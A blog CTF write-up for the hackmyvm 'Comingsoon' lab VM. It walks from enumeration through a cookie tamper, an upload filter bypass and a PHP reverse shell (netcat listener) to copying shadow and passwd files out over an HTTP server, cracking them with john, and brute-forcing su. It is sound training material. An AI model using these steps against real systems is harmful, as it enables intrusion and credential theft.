Skip to content
comingsoon

Hackmyvm Comingsoon

Published by tomkraz on 14 March 2022

The free CTF Challenge web site “hackmyvm.eu” have an other easy level vm called ‘comingsoon‘ for us to download, enumerate and get some flags. This was another inserting one from them which had one interesting step that I found challenging. In this write-up I try to describe my method and thought process on how I completed this hackmyvm comingsoon CTF challenge.

Setup for hackmyvm comingsoon

The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.

My Network,

  • 192.168.186.150 – This is my BlackArch enumeration system.
  • 192.168.186.12 – This is the Comingsoon vm.

For enumeration of the hackmyvm comingsoon Challenge I will be using my BackArch system build that I created in previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.

Enumeration

nmap

First command to run is nmap for network services enumerations

nmap -T5 -F -sV -sC 192.168.186.12
nmap

As there is an apache server running on port 80 and also ssh on port 22.

gobuster

Using gobuster we can find some interesting files and directories. 

gobuster dir -w /usr/share/dirb/wrodlists/common.txt \
-u http://192.168.186.12 -x txt,php,html | grep 200
gobuster

“notes.txt” looks interesting so let’s remember it.

Web Crawling

As the “http” port 80 is already open, so lets take a look in “firefox

First there is the file the notes.txt that we came across with gobuster and we can open it in “firefox“.

note.txt

Interesting, it implies that there are backups somewhere, so lets also keep this in mind.

Lets look at the main web page.

port 80

Nothing much there, lets look at the source code

html code

Interesting, EnableUploader looks like a header. We can reload the page into burpsuite.

burp proxy

There is an encoded cookie and you can decoded it in burpsuite

burp decoder

So its “base64” encoded and has our “EnableUploader” header set to “false”. If you are using Burp Proxy the Cookie can be modified so it’s “true” instead of “false” and reload the page.

burp proxy

Inside the decoder type the word “true” and encoded it into base64. Then replace the section after the “=” with this new string and forward from burpsuite.

hackmyvm comingsoon new button

Now there is a new upload link. With this upload link a reverse php shell can be uploaded. For this, the pentestmonkey reverse shell php script works perfect. The IP address and the Port can to be modified inside this script. The port can be left at the default of 1234.

Seems the uploader does not like php files so rename it so it has a “.phtm” extension. In this case “go.phtml”

This worked a treat.

uploader

Reverse Shell

The uploader put the php script into the “/assets/img/folder. Using a combination of “curl” and “netcat” a reverse shell can be spawned.

In the enumeration host run a netcat command with the same port as you put into the reverse shell script. In on terminal run 

nc -nvlp 1234

And in the other (change your ip to match)

curl "http://192.168.186.12/assets/img/go.phtml"
reverse shell
Reverse Shell

All going well this will spawn a reverse shell, but it needs to be stabilized with the below commands. 

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
<CTRL + Z>
stty raw -echo; fg
reverse shell

Backup files

from the earlier file we found “note.txt” it can be safely assumed there is some sort of backup existing on the system, so lets do a search for any backup files. 

find / --name backup\* 2>/dev/null
backups
Result

There is a backup file so lets copy it to our enumeration machine.

In the reverse shell window type

cd /var/backups
python3 -m http.server

Just download the file locally and unzip it. Inside there is a copy of the shadow and passwd file in this backup archive.

backup file

Using the unshadow command we can get the password cypher and brute force it with john the ripper.

unshadow passwd shadow > ./unshadow
john --wordlist=/opt/rockyou.txt ./unshadow --format=crypt
john

Comingsoon User.txt

Now the password is available so su – to the scpuser is possible. Once access is available for the scpuser home directory we have some interesting files to look at. First the user.txt which contains the CTF user Flag and second is a file called .oldpasswords

scpuser files

Comingsoon oldpasswords

Take a look at .oldpasswords file

old passwords

The previous root passwords were all popular animated movies. Lets try and brute force the root password against the top 100 animate movies.

Before we do the brute force we need to review a list of movies.

  • Grab a list of 100 top animated movies from from the internet,
  • Keep the case and remove spaces.
  • Such a list exists already at my github page already completed.
  • su – can be quite slow to brute force as there is a 5 second gap between tries. You can use my “verify su” script to automate this process.

Once the list is created it can used to brute force the “su -” password. It can either be done manually or it can be done via my python script.

Manually, 

su -
password:

Or with my script.

comingsoon root.txt

The previous steps should give you the root password and from there you can do “su -“. Input the password and then you have the root access.


Conclusion

This was an interesting room because it give me some challenge with the password list.

Published inCTFGetting Started With CTF Challengeshackmyvm.eu

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *